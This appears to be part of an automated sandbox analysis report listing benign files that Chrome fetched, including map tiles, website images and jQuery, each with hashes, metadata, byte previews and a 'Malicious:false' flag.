                                              Size (bytes):15416
                                              Entropy (8bit):5.060834396970304
                                              Encrypted:false
                                              SSDEEP:192:vS1F9gcD+44hNHMG40ZZN2PAQ9hrXx38eNSnfk:K1F9gcD+XNHMQZSPAQzrXtnUfk
                                              MD5:1BE3CAA73D666B1F13CB2CD2117AF675
                                              SHA1:8985B813C50700691190F8AC433E1B8C55063C13
                                              SHA-256:924FA35CE56189C59F40ADE7915B5BC70A638BFF25F3CFCDB8E8386D2CF4DE4F
                                              SHA-512:17F15BC1D081F91748A112233512AC00D94E40C914E268D0D5434EB8F2466B2EE9ED37699AE77747772235D702B77118396AC4951A6909963DFFBEEBD623664E
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.google.com/maps/vt?pb=!1m4!1m3!1i15!2i21411!3i14012!1m4!1m3!1i15!2i21411!3i14013!1m4!1m3!1i15!2i21411!3i14014!1m4!1m3!1i15!2i21412!3i14012!1m4!1m3!1i15!2i21412!3i14013!1m4!1m3!1i15!2i21413!3i14012!1m4!1m3!1i15!2i21413!3i14013!1m4!1m3!1i15!2i21412!3i14014!1m4!1m3!1i15!2i21413!3i14014!1m4!1m3!1i15!2i21414!3i14012!1m4!1m3!1i15!2i21414!3i14013!1m4!1m3!1i15!2i21415!3i14012!2m3!1e0!2sm!3i707457653!2m3!1e2!2sspotlit!5i1!3m12!2sen!3sUS!5e289!12m4!1e68!2m2!1sset!2sRoadmap!12m3!1e37!2m1!1ssmartmaps!4e3!12m1!5b1!27m15!299174093m14!14m13!1m8!1m2!1y4494427010317758935!2y5827414787517094799!2s%2Fg%2F11bbth6f7x!4m2!1x251881333!2x552584050!15sgcid%3Ageneral_contractor!2b0!3b0!6b0!8b0&client=google-maps-embed&token=118179
                                              Preview:[{"id":"vuwtuwvwtwuuuvv","zrange":[15,15],"layer":"spotlit"},{"id":"vuwtuwvwtwuuuvv","base":[1403211008,918362624],"zrange":[15,15],"layer":"m@707457653","features":[{"id":"0x3e5f42035d9872df:0x29698a78cf7295ef","a":[0,0,1403211008,918362624,1403211008,918362624],"bb":[-11,-29,11,2,-11,-29,11,2,-11,-29,11,2,-73,-34,-10,-16],"c":"{\"1\":{\"title\":\".... .....\"}}","io":[0,-13]},{"id":"15761866242058864553","a":[10752,-26624,1403221760,918336000,1403221760,918336000],"bb":[-6,-6,6,6,-6,-6,6,6,-6,-6,6,6],"c":"{\"1\":{\"title\":\".... .... ... ..... ...... 1\",\"is_transit_station\":true}}"},{"id":"12525154212830278467","a":[41984,-47360,1403252992,918315264,1403252992,918315264],"bb":[-11,-29,11,2,-11,-29,11,2,-11,-29,11,2,-126,-27,-10,-9,-101,-13,-9,2],"c":"{\"1\":{\"title\":\".... ... .......\"}}","io":[0,-13]},{"id":"2773930797817177075","a":[31488,-18432,1403242496,918344192,1403242496,918344192],"bb":[-11,-29,11,2,-11,-29,11,2,-11,-29,11,
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):2903
                                              Entropy (8bit):7.911200326507661
                                              Encrypted:false
                                              SSDEEP:48:MrE637uW5vpL73wZ+Wr1InuWFk3OEU2TuUy3vtu5Wu+oKSTF+q9FvK:UEqy6L73wZ+Wr1uuBOnr3vMh9BK
                                              MD5:54EED000C6288091877FB8D74E2CEC36
                                              SHA1:0C8C599AEDA219AF4EDA7638F67F19B49B850393
                                              SHA-256:C5D67C0156FFB0F1796F66D0F1369F7A149B7717DF76499E50C3B9C4595625C8
                                              SHA-512:3843BD883AAEAF625B6361FE9E58413E85CE3A028048A91F7D7DB9A684A7DFF41E0306FAC7AFC2A0846A16064595C4928F0625A94D3727F3E62CCBBD75694063
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/hybrid.png
                                              Preview:.PNG........IHDR...d...d.....G<ef...`PLTE...ut.{w..|.`e.oo.T\.KW.gl.Z`......._d.......R[.......y}.po....CS....U\.......ae..{z.......FN.Z......IDATh..Z.<...H..P.P...[~...&3...s..9k..v'.i.....?.g...~......y...|.......k...?..k...R........&6=.M.P..-k.*?Cd.-...v...</...$...Y|.....X7e...6....#?..P...h%>...Q:...C..8.....9..._........9......!.)4>4.X........b..{..............*@"&`..Ew.&W...W.1......i4....,..H.V.r....qB.ea....9.q..~..0a..q...&...!.v.p..nB....%. .0#FTB{;...u.1i=J......0q@Ic...+.l.Nkz....J..g.P..L..$B*f..@....y.^..7,.M.>Vg...$.,.#Ri.l....A.!..e.w...y.....!...p...T.%C....n,...L.4X.b..s.. (.E..X.. .+..U.a..._... .3..W...hfio..T.....o.....D<..pa.K...d.8_...^....D.w...J#o......J.K,"Q...q...(.P.....O ..r......K.p..LB....H.....&....U.5...D".`&R))1..#.. .b..7,.L.........}..0)w...=.Y.~@...0.....N..$A/.pVC.1.#v.]o...h.....`...t....k.-...J.0...H.L.....]...J.W.z..QP.bW.S.SV..$[.l...a....i.^M...Q^...i..!b...C.F..7.b...J...Ri....."...]..$b..d.H..Fyo.i..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (65447)
                                              Category:dropped
                                              Size (bytes):89501
                                              Entropy (8bit):5.289893677458563
                                              Encrypted:false
                                              SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                              MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                              SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                              SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                              SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                              Malicious:false
                                              Reputation:low
                                              Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):70462
                                              Entropy (8bit):7.996896661598661
                                              Encrypted:true
                                              SSDEEP:1536:BiRQVuy0uBpZkmb5RFGFkzqzQ3169hX0cprb1TTFUFi1vhHc/N:BajO+5k3gzEchb8FiHSN
                                              MD5:231DC1227756A2787C291DE830A9327E
                                              SHA1:9F986B9E280BCCCA36E0D36DEB7EF5B7D7F7323A
                                              SHA-256:0D7E5EB7147DB217C4448E9D57403BC27C953FAAB3FB677516870975CF4D9904
                                              SHA-512:3F237D3F5B4BFBDE353B65EFC39323E9E980936B9249CB3ACFBE7992D23BD79D1A7CD1F28E2DD27096604D4DDA4E951B78B86C8E03B8380A9FC5FF887B2FD632
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/projects/8/0c298f1956a31b39bf820e0dd7ec632b.webp
                                              Preview:RIFF6...WEBPVP8X..............VP8 .........*....>.n.R)&)....9...cK.r....jb.[x.q.k.{....).|'.......m............_........i>........A...{..W.....<...yC.O.............?.^..................~...).G...z..._.........._.J..V.w.).o...>..j...7.s.......L.......Y.H...E..F.j...U=..(,...Xs......+xs.I..V....3..e.1KI....pOb93.(...j......4S.....(..s....J...@.>..U.n...%.Vn.rk.S....."*w.].....X.......8..P..^=.b: ....".d.p7b.06.S.\,K...fZ...,.....$^1..x.H....'.....mWK-..q~.........e.?v...kx#..P.n:m&.b......=.e.S.?......H...&..7....V.n.."...~..,......|.^./.d.S?....L.../.IA..(X.c...f.Z}H....5.#..m.l........P...mF?....|....@7.@......[U.........{9.-...W..y.W.L....G.~. 2....EN..S..H..Z.s......[;...P..$.}3.vVg7..{L....@%.-...,..2C.w.g.J`..tA.!.#J./......h@tM5oTe..ihy...?h.K].K.......?."..r06......G.PK..W~.'...W....7..l...B..A?...ox. a..L;...[.b......k+......F....kM...fE.<..Qp,(.Rs..&.p2].6...z.F.........y.?\.%?.x&Q.......~..'.~V.`$.......-..a.. z..&6w...,|>.#y.f...g8.C...Ng.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:downloaded
                                              Size (bytes):9016
                                              Entropy (8bit):7.947912147871962
                                              Encrypted:false
                                              SSDEEP:192:wEj55pkxSaRCVs+vV1llB2iZFrS27S+9FdcmQ5+0oyhAWByFWidIs9:wA5jkgac1lzm2D/dcmQoyhA9Ddb9
                                              MD5:68E152DB2CF31E55FE259FA40122A343
                                              SHA1:B2FFBB25E204E4ACAB8BA7B5F7C82DF436281484
                                              SHA-256:488650CA73D82583019BA1A1CD52B0DBF1AE193FAFEFDBD7AC4351A698BF4899
                                              SHA-512:79025BC893768CCE5B58F8F70925D82149B11573554118960BCFD3F6433DC0B39CBA39F8DC300727574408E69BECE193A1E3D2ECD16595E91510F7B949B8129E
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/logos/3.png
                                              Preview:.PNG........IHDR.......P......N......tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.2-c000 79.566ebc5b4, 2022/05/09-08:25:55 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 23.4 (Windows)" xmpMM:InstanceID="xmp.iid:A260C674F94611EC8F2ACA399A1C8BAB" xmpMM:DocumentID="xmp.did:A260C675F94611EC8F2ACA399A1C8BAB"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A260C672F94611EC8F2ACA399A1C8BAB" stRef:documentID="xmp.did:A260C673F94611EC8F2ACA399A1C8BAB"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>#..l....IDATx..].X.W.~.4E.b.A.. 6......)j.-..%&..X.Fc.....{A......"E:.?3..rm..4....}.={v....w....!..*/C..)PE
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):4564
                                              Entropy (8bit):7.929284237616848
                                              Encrypted:false
                                              SSDEEP:96:FxsqUkBlZB8V3lmoC8BDGUgLm8o0p4Oi8qoLeWxxNGJ7qdoxZ:TsqH/ZKJ0oCUD+m8o0pC8qixxMJ7qd+
                                              MD5:E643D9A7952D184C3AAC1FDC6EBD5AF6
                                              SHA1:9FE91330A4D31A5B2F66A5E6DE14D763A75DCB59
                                              SHA-256:84F7D71ABCDC247AEC2AA01EBBC36AFE699D6F13AA53AC0F233081390294F93C
                                              SHA-512:1CB161E3ECDC4F9351EC5C2E2C1FE568120796C13C78B53D22F001C309D44DFA6980D5E817B9C359CCBF322754FEDA65D92C95FF4424FBDAD692C55320DA313C
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE.........................7....9..3...........<..5...../......................=.}....9.................8.............6.z.}..x..+..-...........&.......-.~@.~......"....-.3.C..........M....f.....p........<Y..D...._.v....)....6.J..(M.Fe....?...t....................c/.{...}.............5....7.t......I+..w....."D..3.Y.........t..."....]z.......m..O..Q.>......K..v....gm.......2J.{...........Oj`^....IDATh...O.Y....\....s...... ........_.f[)`.Rc[4M5.I._..........vW.9.~.........Mh...-..B.DVj.Y...sU.Y...40x....a..<.]...6D....-..F{v`...&...........I"/K..9...?...v}^.'.PNf.5;.7..."^...s..r.......J.{.9..;...d....Y#...!..DW{;..Xz..99D3.K..^$.q..Y....Ad...q3=..3'.P........d.02....d..w....SurHV.>t.q.c.x.$..(M..q...d`.c"O.aT.].6...I.....h....s.(.O.h.. I$..'...rG.v....d..|...r.......@..G*rR.? %..w.....;.H....D.f....%.9..!..|tV+&.P,....jY..\.7..R..B"i.1....xS.........@..q.c..B..w>....U.M.a{.v..i...v.&Q....T:....Hx;.I5.)
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:downloaded
                                              Size (bytes):10746
                                              Entropy (8bit):7.967697239386691
                                              Encrypted:false
                                              SSDEEP:192:UIIHUCD4wa3SiFQqC6zd7bs65itcVScDodbRNuA1HUjlZWH7yfTwmwGPcKmP34ce:K0wDiF1hzdnDG6SzuiH7ysmBPcKo4c8T
                                              MD5:02F61F05265112509B647F7722CEFF4D
                                              SHA1:C1C13767B24584A11E14BC79D9F514928E86C26A
                                              SHA-256:93D4492C899DB18DC289197DD7BADD80DA94047CBD303B6F4C67064F50CECE5A
                                              SHA-512:2F51EFC9362A9E22BEE98D6C4B2730B2C2E129ABEFCB26CC01EBC0D8761BAF02DDAFAF720B6CAD87E7D20BF8CC89E4CA4B2B9A671C479A0CCA9D3265859C7D4A
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/logos/ss-lootah.png
                                              Preview:.PNG........IHDR.......P......N......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):14393
                                              Entropy (8bit):7.658645511163834
                                              Encrypted:false
                                              SSDEEP:384:4YNg7wz6tHkcNQg2D1ITTScipGK97yWQMR7:4YyEzS5SneTApWnw
                                              MD5:4D66B37D7AF4EE8096C50B71C3F8A8E3
                                              SHA1:D902C05D71F6121CCF4862F604E6B13BCE35ADB3
                                              SHA-256:06501106B5D04F91FE5891A8D59711E07A45D08288BBA408629A5D881B719537
                                              SHA-512:43D65E2399781129452BF1B574008EB7B8493A39CA747212882526315BA61F17467ED8C7D4750C6495E7BAFC7F56CEFD2B6E02A083CBE5EAF90BF5C742BCD1B4
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 1000x800, components 3
                                              Category:dropped
                                              Size (bytes):85053
                                              Entropy (8bit):7.9741446241005365
                                              Encrypted:false
                                              SSDEEP:1536:7tfYspZtJxa3My5WBvOKn48svFlg6g8G1UAH3r+iwbiHqk+dArPuyec59Bd9:7t57I3MqhKn47vFWnF17H3r+iwbUqk+e
                                              MD5:9AB36147B377010901879591F4A6F405
                                              SHA1:E0CECE187F6FE881DF612282D03484CA00A3A4D3
                                              SHA-256:0CF25AEF812FE3EBB0064457682D90F917235FFE1AD48E985466E1DB77B7587D
                                              SHA-512:F98FCFE51E64E79CD9E5D26C9DE6C9B188DB4955DC214701F02B22B57DD71B69BB942572267628FF1246A50BF11B3700D8621A1EB1C169CE356DCE9A1C5C9396
                                              Malicious:false
                                              Reputation:low
                                              Preview:......Exif..II*.................Ducky............./http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)" xmpMM:InstanceID="xmp.iid:C6701F23934411ED9720B1AA81A24AFA" xmpMM:DocumentID="xmp.did:C6701F24934411ED9720B1AA81A24AFA"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:C6701F21934411ED9720B1AA81A24AFA" stRef:documentID="xmp.did:C6701F22934411ED9720B1AA81A24AFA"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...!Adobe.d..............HV..._..L;..........................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):2903
                                              Entropy (8bit):7.911200326507661
                                              Encrypted:false
                                              SSDEEP:48:MrE637uW5vpL73wZ+Wr1InuWFk3OEU2TuUy3vtu5Wu+oKSTF+q9FvK:UEqy6L73wZ+Wr1uuBOnr3vMh9BK
                                              MD5:54EED000C6288091877FB8D74E2CEC36
                                              SHA1:0C8C599AEDA219AF4EDA7638F67F19B49B850393
                                              SHA-256:C5D67C0156FFB0F1796F66D0F1369F7A149B7717DF76499E50C3B9C4595625C8
                                              SHA-512:3843BD883AAEAF625B6361FE9E58413E85CE3A028048A91F7D7DB9A684A7DFF41E0306FAC7AFC2A0846A16064595C4928F0625A94D3727F3E62CCBBD75694063
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....G<ef...`PLTE...ut.{w..|.`e.oo.T\.KW.gl.Z`......._d.......R[.......y}.po....CS....U\.......ae..{z.......FN.Z......IDATh..Z.<...H..P.P...[~...&3...s..9k..v'.i.....?.g...~......y...|.......k...?..k...R........&6=.M.P..-k.*?Cd.-...v...</...$...Y|.....X7e...6....#?..P...h%>...Q:...C..8.....9..._........9......!.)4>4.X........b..{..............*@"&`..Ew.&W...W.1......i4....,..H.V.r....qB.ea....9.q..~..0a..q...&...!.v.p..nB....%. .0#FTB{;...u.1i=J......0q@Ic...+.l.Nkz....J..g.P..L..$B*f..@....y.^..7,.M.>Vg...$.,.#Ri.l....A.!..e.w...y.....!...p...T.%C....n,...L.4X.b..s.. (.E..X.. .+..U.a..._... .3..W...hfio..T.....o.....D<..pa.K...d.8_...^....D.w...J#o......J.K,"Q...q...(.P.....O ..r......K.p..LB....H.....&....U.5...D".`&R))1..#.. .b..7,.L.........}..0)w...=.Y.~@...0.....N..$A/.pVC.1.#v.]o...h.....`...t....k.-...J.0...H.L.....]...J.W.z..QP.bW.S.SV..$[.l...a....i.^M...Q^...i..!b...C.F..7.b...J...Ri....."...]..$b..d.H..Fyo.i..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 196x61, components 3
                                              Category:dropped
                                              Size (bytes):2326
                                              Entropy (8bit):7.726565668160658
                                              Encrypted:false
                                              SSDEEP:48:ueXVrHftdtW4iThDhhhqcGoC0JeWTu9SbO5RkZH2+JZ:u2rftbi118ee6SRYWE
                                              MD5:69023E5B2A2040F40A9A4F86EE22CA28
                                              SHA1:A9D5DD8EF335CA4B0A4CBC6A6875797D1230B2D9
                                              SHA-256:8B5EE668094FACCC85C7CA06417E3DE01224CC392F89F10897D762AB6CB6291E
                                              SHA-512:F89462992ADC9AA0BFC77713922FF1F1FF8CA3E6999463AAA284751385B31F479128EDAF38D62A3BE4DC9987E1B74F7F890DC0E115673F61180A35B9F566F5B6
                                              Malicious:false
                                              Reputation:low
                                              Preview:......JFIF.................................... ..............&...#..../ $'),,,. 152*5(+/)...........)...))))))))))))))))))))))))))))))))))))))))))))))))))......=...."......................................4......................!1.AQ.."aq........2R..Bbr...........................................................?...),..f......].@>..J4....[@.r.j...P..NJ.".?].)aH.........8..i....j.BS..............R...eqx.R.3S..<_...7.2....B.[... 3R.<.Ztq.......I*J.$..;.SHR0[...r..J...*..O..8.\78...c. .JO+....~u...X.7..Y./z.)d.5...I....s...J3......kN.@.sI.qcJ....!......t<..b.P.T.R..[.^.v.4LIU*J\..9...../..WE.......Q..K.Q......$...(..A.>w>...A..Bt9V....O...(,..MA.r.p.Y\..5....`1..*....S2z...X>.\..J.......^..:..AL...\.g.<.[.......$OB.T....w..T.....L...X%.h..kA....k...T.%........+.......~..G..j...Z'.S$.^..8%).-..!.e.-j.....]...."D..N.2Y.g..C....an...B....@Q....q......2.0p..6Q~..`phq..!......| ...J[.~."`M.Om.L.!....=...`j..=......#.|.c .4..e...U."..w...N.k?|....2.....?-..g.c..D+
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):4440
                                              Entropy (8bit):7.35199130907316
                                              Encrypted:false
                                              SSDEEP:96:nBfd6CdlHUa15clADXKzh0ammRnbEhg3X/1tLwq:nB11ncp908bD3R
                                              MD5:8F8BC2286E823D24D028E4C2B7CE754D
                                              SHA1:DAFD86AFFC86550808E7E83EE798D61DAFA2D8C3
                                              SHA-256:38F3003CE12A8E7A1933104C908F17DD6B3AF20AF2F44657C976290CDC9B92F7
                                              SHA-512:41D6A11F075224B9186C35E9C5CBE3635BADF988383564BD4E37905EB17DBF393ACE7446E953C6F540B980C38D63AD12C65D97274035D3585660A00C43946CFF
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/youtube.png
                                              Preview:.PNG........IHDR..............$.....sBIT.....O.....pHYs..._..._........tEXtSoftware.www.inkscape.org..<.....PLTE..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................K.....tRNS................................ !"#$%'()*+,-/0123456789;<=>?ABCDEFHIJKLMNOPQSTUWXYZ[]^_`abdeghiklmopqrstuvwyz{|}.............................................................................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 640x480, components 3
                                              Category:downloaded
                                              Size (bytes):61373
                                              Entropy (8bit):7.982365509234224
                                              Encrypted:false
                                              SSDEEP:1536:xTXmBrQOCpUr8eZyU4BoH+w0O7b9JKRj7FB0yM4/sE2OBMFna1e:xTXmGOCpUnkBfDO36X0yr/ssKa0
                                              MD5:27B9C0EE72AEE01877029093453B013F
                                              SHA1:A3DE0603A3A9B2891CD889BA0030849D056FFE5C
                                              SHA-256:1F91094D6A5A6F1E5BC00CC000803B70885A849C0822FD1C9A0BC6762FCBEA2F
                                              SHA-512:90468E5B7711BC3D1509ADE4134088D04FC96D64757D22AD96DC4E176DD688EC55F5F5382B12712B7E88425489364B8AD1F0C610A39BB735D32FF065B8B647AC
                                              Malicious:false
                                              Reputation:low
                                              URL:https://i.ytimg.com/vi/QJ96N5lUn0c/sddefault.jpg
                                              Preview:......JFIF..........................................................................................................................................................."........................................_........................!..1A."Qaq.2.....#BRb...$3r........CSc...4Ts......%Ddt........5u..................................4.......................!1..AQ.."2aq.3B.......#CR..............?.....Z..z.UJ.X9Q..HoO....s.&..h~.t.se(."a;.M..w.T....a.O.Q.....^.JD.t.aS.j<.....L.8....k<.$... ..5>..X..u..L........a1..:.-.2n.O.!....*sAX...<L.Dr.....82.5?X.k....[...>2>.Y.......hKL.......:.$T.Q..i..e..?.?Z.e..z....G..$......$..d....M....J........Nx$..'.5..p...pLl.Nn..v..c..iM.+.@..."t..%C.h.9..[....M..U..../..E.b..t.-..F....R...k"..s#..x\..D...A.r4?cc.)....H.D.M.n...!E..E.H.h..E.....J...R.t.....P{..Oe.W.M.... .s..$.YS.=.@>.....4.=.r.F.%A.Q,X.7}JF...wS..".d6....."....V..v.....Z.V.......t...(........"....)...4.aN0.0.B..(.Z.E.bH..WBS.)..%:..V.A.LBV:qc
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):21576
                                              Entropy (8bit):7.983670910342692
                                              Encrypted:false
                                              SSDEEP:384:VD+KqPsV9zidnOYQ+zecoM4HvcS/zi3zpi5KCt2PRIElfkmOuWr93lVdqj+Ziod6:VD+xPQzEhQ+6cb4PcSYEICtWRIEqNdef
                                              MD5:E5751BE6D4F63180D5FCDBC5C6D8C7B2
                                              SHA1:9C4FC1AA915FC70C375E35EABF5BB061B9DB9867
                                              SHA-256:9049E23B39614BD16EA4121450D8D4FE8F0A6A3CEE559362B269FC0A55F39C2B
                                              SHA-512:F5789A6DFBDC0937210CEA70D07B8507FA58CCB27727595D4C5AB3C5958419DC36DA0800C537C453C932DE57CD916C5BA227B3051FE17C4C436B22403F330C47
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.google.com/maps/vt?pb=!1m5!1m4!1i15!2i21415!3i14012!4i256!2m3!1e0!2sm!3i707457629!2m3!1e2!2sspotlit!5i1!3m12!2sen!3sUS!5e289!12m4!1e68!2m2!1sset!2sRoadmap!12m3!1e37!2m1!1ssmartmaps!4e0!5m1!1e3!23i47083502!27m15!299174093m14!14m13!1m8!1m2!1y4494427010317758935!2y5827414787517094799!2s%2Fg%2F11bbth6f7x!4m2!1x251881333!2x552584050!15sgcid%3Ageneral_contractor!2b0!3b0!6b0!8b0&client=google-maps-embed&token=51392
                                              Preview:RIFF@T..WEBPVP8L3T../..?....%')2....<r....8......6 .m.:...E.!.K;.o.m#.>.U$I....|......_.3.......0. 6.....`TT..1.C.M........R....Q1 .*....&.8.$..3..]...?YG.D...DNDN. b'b.... Ed@J........Q....7v/..8..+....{. ..!T.....U.K....[./.}o....l....T\.t..Z.+..X...BX.........A.m4sR..l.t<.vL....9..-.l;..c.^..E.....!kA.....S....K.9.;Z.\.q.T*.....a!1.z*.B.d..J...r..~..(.......O.[.~...T..~=.?a.......%....$..\8.=xF../2)&g^....H{..I.....F'&#F.F+^.}.>.Z.*U.T.R.x.1..i.......$..J.B..THUR.. C*E.Z...A....n...T...g..fP.$.."*.....(J;{]=h..wNk......~.!...$I...\..d=`@..N*.=.B.m......GlM...OC........_..I...l.W...=.r..e..fs..E.Kq........!...z..;I..0...cgz.C.(A..R..hf..........m.`6.....|x..-S...b|o~.G..UJ.}l.uH.\....{I...P.'....l p...p.7}]"b.....M.A...P)........%.9.Y..(..aj$&.>S.n.X!..D..];.A...+..d...&.X..B..........O......6....,D.G.G..pT..'GG0...B$.n.[..I........#J..@Fg..Xs...Q<O..v.b6D;S....r....\at.k.Mq47.....#b.Y1.B.P.W.......b..P.+.{.j....442F........4&....k..D....Q
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (1728)
                                              Category:dropped
                                              Size (bytes):100448
                                              Entropy (8bit):5.479146671020334
                                              Encrypted:false
